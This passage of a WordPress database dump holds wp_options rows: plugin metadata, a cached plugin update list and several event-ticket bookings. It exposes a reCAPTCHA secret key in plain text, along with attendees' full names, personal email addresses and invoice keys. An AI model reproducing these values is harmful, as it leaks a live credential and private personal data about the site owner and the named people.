Upkeep\";s:10:\"AuthorName\";s:8:\"BoldGrid\";}s:51:\"boldgrid-backup-premium/boldgrid-backup-premium.php\";a:14:{s:4:\"Name\";s:20:\"Total Upkeep Premium\";s:9:\"PluginURI\";s:41:\"https://www.boldgrid.com/boldgrid-backup/\";s:7:\"Version\";s:5:\"1.5.9\";s:11:\"Description\";s:46:\"Premium extension for the Total Upkeep plugin.\";s:6:\"Author\";s:8:\"BoldGrid\";s:9:\"AuthorURI\";s:25:\"https://www.boldgrid.com/\";s:10:\"TextDomain\";s:15:\"boldgrid-backup\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:20:\"Total Upkeep Premium\";s:10:\"AuthorName\";s:8:\"BoldGrid\";}}','no'),(7590251,'wpcaptcha_meta','a:3:{s:13:\"first_version\";s:4:\"1.12\";s:13:\"first_install\";i:1699009140;s:12:\"database_ver\";s:4:\"1.12\";}','yes'),(7590252,'wpcaptcha_options','a:11:{s:7:\"captcha\";s:11:\"recaptchav3\";s:16:\"captcha_site_key\";s:40:\"6LeDktUhAAAAAHiDs41sZkBo-lVEOB8_Y-P7X-iH\";s:18:\"captcha_secret_key\";s:40:\"6LeDktUhAAAAAAXS3zubRB3rEXtl3ZePn0TW5jGP\";s:18:\"captcha_show_login\";i:1;s:28:\"captcha_show_wp_registration\";i:0;s:29:\"captcha_show_wp_lost_password\";i:0;s:23:\"captcha_show_wp_comment\";i:0;s:29:\"captcha_show_woo_registration\";i:0;s:25:\"captcha_show_woo_checkout\";i:0;s:29:\"captcha_show_edd_registration\";i:0;s:28:\"captcha_show_bp_registration\";i:0;}','yes'),(7363708,'rsssl_previous_version','7.0.9','no'),(7352201,'NXB88494','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1681036200:1681039800\";s:8:\"event_id\";s:6:\"268197\";s:19:\"translated_event_id\";s:6:\"268197\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268386;s:11:\"invoice_key\";s:32:\"d78da7fd89abf7b84f9abbe2283b1b23\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7352178,'FZE83069','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:15:\"Beth Massengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1681036200:1681039800\";s:8:\"event_id\";s:6:\"268197\";s:19:\"translated_event_id\";s:6:\"268197\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268385;s:11:\"invoice_key\";s:32:\"f023fd59226351544041feb6e40884e4\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:15:\"Beth Massengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7351900,'HVO20373','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1681036200:1681039800\";s:8:\"event_id\";s:6:\"268197\";s:19:\"translated_event_id\";s:6:\"268197\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268383;s:11:\"invoice_key\";s:32:\"12b666f92c0efcffe9264f5c3fa41d82\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7521134,'mec_cart_289971022','a:0:{}','no'),(7542481,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1699375907;s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:37:{s:37:\"tinymce-advanced/tinymce-advanced.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:30:\"w.org/plugins/tinymce-advanced\";s:4:\"slug\";s:16:\"tinymce-advanced\";s:6:\"plugin\";s:37:\"tinymce-advanced/tinymce-advanced.php\";s:11:\"new_version\";s:5:\"5.9.2\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/tinymce-advanced/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/tinymce-advanced.5.9.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/tinymce-advanced/assets/icon-256x256.png?rev=971511\";s:2:\"1x\";s:68:\"https://ps.w.org/tinymce-advanced/assets/icon-128x128.png?rev=971511\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/tinymce-advanced/assets/banner-1544x500.png?rev=2390186\";s:2:\"1x\";s:71:\"https://ps.w.org/tinymce-advanced/assets/banner-772x250.png?rev=2390186\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.9\";}s:55:\"advanced-google-recaptcha/advanced-google-recaptcha.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:39:\"w.org/plugins/advanced-google-recaptcha\";s:4:\"slug\";s:25:\"advanced-google-recaptcha\";s:6:\"plugin\";s:55:\"advanced-google-recaptcha/advanced-google-recaptcha.php\";s:11:\"new_version\";s:4:\"1.12\";s:3:\"url\";s:56:\"https://wordpress.org/plugins/advanced-google-recaptcha/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/advanced-google-recaptcha.1.12.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:78:\"https://ps.w.org/advanced-google-recaptcha/assets/icon-256x256.png?rev=2493018\";s:2:\"1x\";s:78:\"https://ps.w.org/advanced-google-recaptcha/assets/icon-256x256.png?rev=2493018\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:81:\"https://ps.w.org/advanced-google-recaptcha/assets/banner-1544x500.png?rev=2493021\";s:2:\"1x\";s:80:\"https://ps.w.org/advanced-google-recaptcha/assets/banner-772x250.png?rev=2493154\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:37:\"async-javascript/async-javascript.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:30:\"w.org/plugins/async-javascript\";s:4:\"slug\";s:16:\"async-javascript\";s:6:\"plugin\";s:37:\"async-javascript/async-javascript.php\";s:11:\"new_version\";s:10:\"2.21.08.31\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/async-javascript/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/async-javascript.2.21.08.31.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/async-javascript/assets/icon-128x128.png?rev=1839260\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}s:27:\"autoptimize/autoptimize.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/autoptimize\";s:4:\"slug\";s:11:\"autoptimize\";s:6:\"plugin\";s:27:\"autoptimize/autoptimize.php\";s:11:\"new_version\";s:5:\"3.1.9\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/autoptimize/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/autoptimize.3.1.9.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/autoptimize/assets/icon-256X256.png?rev=2211608\";s:2:\"1x\";s:64:\"https://ps.w.org/autoptimize/assets/icon-128x128.png?rev=1864142\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/autoptimize/assets/banner-772x250.jpg?rev=1315920\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.3\";}s:39:\"boldgrid-easy-seo/boldgrid-easy-seo.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:31:\"w.org/plugins/boldgrid-easy-seo\";s:4:\"slug\";s:17:\"boldgrid-easy-seo\";s:6:\"plugin\";s:39:\"boldgrid-easy-seo/boldgrid-easy-seo.php\";s:11:\"new_version\";s:6:\"1.6.13\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/boldgrid-easy-seo/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/boldgrid-easy-seo.1.6.13.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/boldgrid-easy-seo/assets/icon-256x256.png?rev=1773296\";s:2:\"1x\";s:70:\"https://ps.w.org/boldgrid-easy-seo/assets/icon-128x128.png?rev=1773296\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/boldgrid-easy-seo/assets/banner-1544x500.png?rev=1773381\";s:2:\"1x\";s:72:\"https://ps.w.org/boldgrid-easy-seo/assets/banner-772x250.png?rev=1773381\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.4\";}s:31:\"kt-tinymce-color-grid/index.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:35:\"w.org/plugins/kt-tinymce-color-grid\";s:4:\"slug\";s:21:\"kt-tinymce-color-grid\";s:6:\"plugin\";s:31:\"kt-tinymce-color-grid/index.php\";s:11:\"new_version\";s:6:\"1.15.5\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/kt-tinymce-color-grid/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/kt-tinymce-color-grid.1.15.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/kt-tinymce-color-grid/assets/icon-256x256.png?rev=1095993\";s:2:\"1x\";s:74:\"https://ps.w.org/kt-tinymce-color-grid/assets/icon-128x128.png?rev=1095993\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:76:\"https://ps.w.org/kt-tinymce-color-grid/assets/banner-772x250.png?rev=1633565\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.2\";}s:31:\"code-snippets/code-snippets.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:27:\"w.org/plugins/code-snippets\";s:4:\"slug\";s:13:\"code-snippets\";s:6:\"plugin\";s:31:\"code-snippets/code-snippets.php\";s:11:\"new_version\";s:5:\"3.6.1\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/code-snippets/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/code-snippets.3.6.1.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:58:\"https://ps.w.org/code-snippets/assets/icon.svg?rev=2148878\";s:3:\"svg\";s:58:\"https://ps.w.org/code-snippets/assets/icon.svg?rev=2148878\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/code-snippets/assets/banner-1544x500.png?rev=2260997\";s:2:\"1x\";s:68:\"https://ps.w.org/code-snippets/assets/banner-772x250.png?rev=2256244\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";}s:37:\"disable-comments/disable-comments.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:30:\"w.org/plugins/disable-comments\";s:4:\"slug\";s:16:\"disable-comments\";s:6:\"plugin\";s:37:\"disable-comments/disable-comments.php\";s:11:\"new_version\";s:5:\"2.4.5\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/disable-comments/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/disable-comments.2.4.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/disable-comments/assets/icon-256x256.png?rev=2509854\";s:2:\"1x\";s:69:\"https://ps.w.org/disable-comments/assets/icon-128x128.png?rev=2509854\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/disable-comments/assets/banner-1544x500.png?rev=2509854\";s:2:\"1x\";s:71:\"https://ps.w.org/disable-comments/assets/banner-772x250.png?rev=2509854\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";}s:25:\"fluentform/fluentform.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:24:\"w.org/plugins/fluentform\";s:4:\"slug\";s:10:\"fluentform\";s:6:\"plugin\";s:25:\"fluentform/fluentform.php\";s:11:\"new_version\";s:5:\"5.1.1\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/fluentform/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/fluentform.5.1.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/fluentform/assets/icon-256x256.png?rev=1794277\";s:2:\"1x\";s:63:\"https://ps.w.org/fluentform/assets/icon-128x128.png?rev=1794277\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/fluentform/assets/banner-1544x500.png?rev=2957809\";s:2:\"1x\";s:65:\"https://ps.w.org/fluentform/assets/banner-772x250.png?rev=2957809\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.5\";}s:43:\"ga-google-analytics/ga-google-analytics.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:33:\"w.org/plugins/ga-google-analytics\";s:4:\"slug\";s:19:\"ga-google-analytics\";s:6:\"plugin\";s:43:\"ga-google-analytics/ga-google-analytics.php\";s:11:\"new_version\";s:8:\"20231101\";s:3:\"url\";s:50:\"https://wordpress.org/plugins/ga-google-analytics/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/ga-google-analytics.20231101.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/ga-google-analytics/assets/icon-256x256.png?rev=2053004\";s:2:\"1x\";s:72:\"https://ps.w.org/ga-google-analytics/assets/icon-128x128.png?rev=2053004\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:75:\"https://ps.w.org/ga-google-analytics/assets/banner-1544x500.jpg?rev=1926485\";s:2:\"1x\";s:74:\"https://ps.w.org/ga-google-analytics/assets/banner-772x250.jpg?rev=1926485\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}s:65:\"html-editor-syntax-highlighter/html-editor-syntax-highlighter.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:44:\"w.org/plugins/html-editor-syntax-highlighter\";s:4:\"slug\";s:30:\"html-editor-syntax-highlighter\";s:6:\"plugin\";s:65:\"html-editor-syntax-highlighter/html-editor-syntax-highlighter.php\";s:11:\"new_version\";s:5:\"2.4.4\";s:3:\"url\";s:61:\"https://wordpress.org/plugins/html-editor-syntax-highlighter/\";s:7:\"package\";s:79:\"https://downloads.wordpress.org/plugin/html-editor-syntax-highlighter.2.4.4.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:75:\"https://ps.w.org/html-editor-syntax-highlighter/assets/icon.svg?rev=2013780\";s:3:\"svg\";s:75:\"https://ps.w.org/html-editor-syntax-highlighter/assets/icon.svg?rev=2013780\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:86:\"https://ps.w.org/html-editor-syntax-highlighter/assets/banner-1544x500.png?rev=2013780\";s:2:\"1x\";s:85:\"https://ps.w.org/html-editor-syntax-highlighter/assets/banner-772x250.png?rev=2013780\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:35:\"modula-best-grid-gallery/Modula.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:38:\"w.org/plugins/modula-best-grid-gallery\";s:4:\"slug\";s:24:\"modula-best-grid-gallery\";s:6:\"plugin\";s:35:\"modula-best-grid-gallery/Modula.php\";s:11:\"new_version\";s:5:\"2.7.8\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/modula-best-grid-gallery/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/modula-best-grid-gallery.2.7.8.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:77:\"https://ps.w.org/modula-best-grid-gallery/assets/icon-256x256.png?rev=2914735\";s:2:\"1x\";s:77:\"https://ps.w.org/modula-best-grid-gallery/assets/icon-256x256.png?rev=2914735\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:79:\"https://ps.w.org/modula-best-grid-gallery/assets/banner-772x250.jpg?rev=2914729\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.3\";}s:27:\"ninja-forms/ninja-forms.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/ninja-forms\";s:4:\"slug\";s:11:\"ninja-forms\";s:6:\"plugin\";s:27:\"ninja-forms/ninja-forms.php\";s:11:\"new_version\";s:6:\"3.6.34\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/ninja-forms/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/ninja-forms.3.6.34.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/ninja-forms/assets/icon-256x256.png?rev=1649747\";s:2:\"1x\";s:64:\"https://ps.w.org/ninja-forms/assets/icon-128x128.png?rev=1649747\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/ninja-forms/assets/banner-1544x500.png?rev=2069024\";s:2:\"1x\";s:66:\"https://ps.w.org/ninja-forms/assets/banner-772x250.png?rev=2069024\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.0\";}s:55:\"styler-for-ninja-forms-lite/ninja-forms-styler-lite.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:41:\"w.org/plugins/styler-for-ninja-forms-lite\";s:4:\"slug\";s:27:\"styler-for-ninja-forms-lite\";s:6:\"plugin\";s:55:\"styler-for-ninja-forms-lite/ninja-forms-styler-lite.php\";s:11:\"new_version\";s:5:\"3.3.4\";s:3:\"url\";s:58:\"https://wordpress.org/plugins/styler-for-ninja-forms-lite/\";s:7:\"package\";s:76:\"https://downloads.wordpress.org/plugin/styler-for-ninja-forms-lite.3.3.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:80:\"https://ps.w.org/styler-for-ninja-forms-lite/assets/icon-256x256.png?rev=2190303\";s:2:\"1x\";s:80:\"https://ps.w.org/styler-for-ninja-forms-lite/assets/icon-256x256.png?rev=2190303\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:83:\"https://ps.w.org/styler-for-ninja-forms-lite/assets/banner-1544x500.png?rev=2337814\";s:2:\"1x\";s:82:\"https://ps.w.org/styler-for-ninja-forms-lite/assets/banner-772x250.png?rev=2337814\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.9\";}s:39:\"content-protector/content-protector.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:31:\"w.org/plugins/content-protector\";s:4:\"slug\";s:17:\"content-protector\";s:6:\"plugin\";s:39:\"content-protector/content-protector.php\";s:11:\"new_version\";s:5:\"4.2.5\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/content-protector/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/content-protector.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/content-protector/assets/icon-256x256.png?rev=2206760\";s:2:\"1x\";s:70:\"https://ps.w.org/content-protector/assets/icon-128x128.png?rev=2206760\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/content-protector/assets/banner-1544x500.png?rev=2206760\";s:2:\"1x\";s:72:\"https://ps.w.org/content-protector/assets/banner-772x250.png?rev=2206760\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.2\";}s:39:\"plugin-notes-plus/plugin-notes-plus.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:31:\"w.org/plugins/plugin-notes-plus\";s:4:\"slug\";s:17:\"plugin-notes-plus\";s:6:\"plugin\";s:39:\"plugin-notes-plus/plugin-notes-plus.php\";s:11:\"new_version\";s:5:\"1.2.6\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/plugin-notes-plus/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/plugin-notes-plus.1.2.6.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:62:\"https://ps.w.org/plugin-notes-plus/assets/icon.svg?rev=1821775\";s:3:\"svg\";s:62:\"https://ps.w.org/plugin-notes-plus/assets/icon.svg?rev=1821775\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/plugin-notes-plus/assets/banner-1544x500.png?rev=1821609\";s:2:\"1x\";s:72:\"https://ps.w.org/plugin-notes-plus/assets/banner-772x250.png?rev=1821609\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:47:\"post-and-page-builder/post-and-page-builder.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:35:\"w.org/plugins/post-and-page-builder\";s:4:\"slug\";s:21:\"post-and-page-builder\";s:6:\"plugin\";s:47:\"post-and-page-builder/post-and-page-builder.php\";s:11:\"new_version\";s:6:\"1.25.1\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/post-and-page-builder/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/post-and-page-builder.1.25.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/post-and-page-builder/assets/icon-256x256.png?rev=1768477\";s:2:\"1x\";s:74:\"https://ps.w.org/post-and-page-builder/assets/icon-128x128.png?rev=1768477\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:77:\"https://ps.w.org/post-and-page-builder/assets/banner-1544x500.png?rev=1768477\";s:2:\"1x\";s:76:\"https://ps.w.org/post-and-page-builder/assets/banner-772x250.png?rev=1768477\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.7\";}s:30:\"protect-the-children/index.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:34:\"w.org/plugins/protect-the-children\";s:4:\"slug\";s:20:\"protect-the-children\";s:6:\"plugin\";s:30:\"protect-the-children/index.php\";s:11:\"new_version\";s:5:\"1.4.0\";s:3:\"url\";s:51:\"https://wordpress.org/plugins/protect-the-children/\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/plugin/protect-the-children.1.4.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/protect-the-children/assets/icon-256x256.jpg?rev=1701934\";s:2:\"1x\";s:73:\"https://ps.w.org/protect-the-children/assets/icon-128x128.jpg?rev=1701934\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/protect-the-children/assets/banner-1544x500.jpg?rev=2169694\";s:2:\"1x\";s:75:\"https://ps.w.org/protect-the-children/assets/banner-772x250.jpg?rev=2169694\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";b:0;}s:27:\"redis-cache/redis-cache.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/redis-cache\";s:4:\"slug\";s:11:\"redis-cache\";s:6:\"plugin\";s:27:\"redis-cache/redis-cache.php\";s:11:\"new_version\";s:5:\"2.4.4\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/redis-cache/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/redis-cache.2.4.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/redis-cache/assets/icon-256x256.gif?rev=2568513\";s:2:\"1x\";s:64:\"https://ps.w.org/redis-cache/assets/icon-128x128.gif?rev=2568513\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/redis-cache/assets/banner-1544x500.png?rev=2315420\";s:2:\"1x\";s:66:\"https://ps.w.org/redis-cache/assets/banner-772x250.png?rev=2315420\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.3\";}s:45:\"remember-me-controls/remember-me-controls.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:34:\"w.org/plugins/remember-me-controls\";s:4:\"slug\";s:20:\"remember-me-controls\";s:6:\"plugin\";s:45:\"remember-me-controls/remember-me-controls.php\";s:11:\"new_version\";s:5:\"2.0.1\";s:3:\"url\";s:51:\"https://wordpress.org/plugins/remember-me-controls/\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/plugin/remember-me-controls.2.0.1.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:73:\"https://ps.w.org/remember-me-controls/assets/icon-128x128.png?rev=1096911\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:74:\"https://ps.w.org/remember-me-controls/assets/banner-772x250.png?rev=838900\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";}s:66:\"remove-dashboard-access-for-non-admins/remove-dashboard-access.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:52:\"w.org/plugins/remove-dashboard-access-for-non-admins\";s:4:\"slug\";s:38:\"remove-dashboard-access-for-non-admins\";s:6:\"plugin\";s:66:\"remove-dashboard-access-for-non-admins/remove-dashboard-access.php\";s:11:\"new_version\";s:5:\"1.1.5\";s:3:\"url\";s:69:\"https://wordpress.org/plugins/remove-dashboard-access-for-non-admins/\";s:7:\"package\";s:87:\"https://downloads.wordpress.org/plugin/remove-dashboard-access-for-non-admins.1.1.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:91:\"https://ps.w.org/remove-dashboard-access-for-non-admins/assets/icon-256x256.png?rev=2963265\";s:2:\"1x\";s:91:\"https://ps.w.org/remove-dashboard-access-for-non-admins/assets/icon-128x128.png?rev=2963265\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:94:\"https://ps.w.org/remove-dashboard-access-for-non-admins/assets/banner-1544x500.png?rev=2963265\";s:2:\"1x\";s:93:\"https://ps.w.org/remove-dashboard-access-for-non-admins/assets/banner-772x250.png?rev=2963265\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"3.1.0\";}s:58:\"responsive-accordion-and-collapse/responsive-accordion.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:47:\"w.org/plugins/responsive-accordion-and-collapse\";s:4:\"slug\";s:33:\"responsive-accordion-and-collapse\";s:6:\"plugin\";s:58:\"responsive-accordion-and-collapse/responsive-accordion.php\";s:11:\"new_version\";s:5:\"2.4.5\";s:3:\"url\";s:64:\"https://wordpress.org/plugins/responsive-accordion-and-collapse/\";s:7:\"package\";s:82:\"https://downloads.wordpress.org/plugin/responsive-accordion-and-collapse.2.4.5.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:86:\"https://ps.w.org/responsive-accordion-and-collapse/assets/icon-128x128.png?rev=2339019\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:88:\"https://ps.w.org/responsive-accordion-and-collapse/assets/banner-772x250.png?rev=1909708\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";}s:42:\"scripts-to-footerphp/scripts-to-footer.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:34:\"w.org/plugins/scripts-to-footerphp\";s:4:\"slug\";s:20:\"scripts-to-footerphp\";s:6:\"plugin\";s:42:\"scripts-to-footerphp/scripts-to-footer.php\";s:11:\"new_version\";s:5:\"0.7.1\";s:3:\"url\";s:51:\"https://wordpress.org/plugins/scripts-to-footerphp/\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/plugin/scripts-to-footerphp.0.7.1.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:71:\"https://s.w.org/plugins/geopattern-icon/scripts-to-footerphp_fcfefd.svg\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:74:\"https://ps.w.org/scripts-to-footerphp/assets/banner-772x250.jpg?rev=833162\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:39:\"simple-custom-css/sim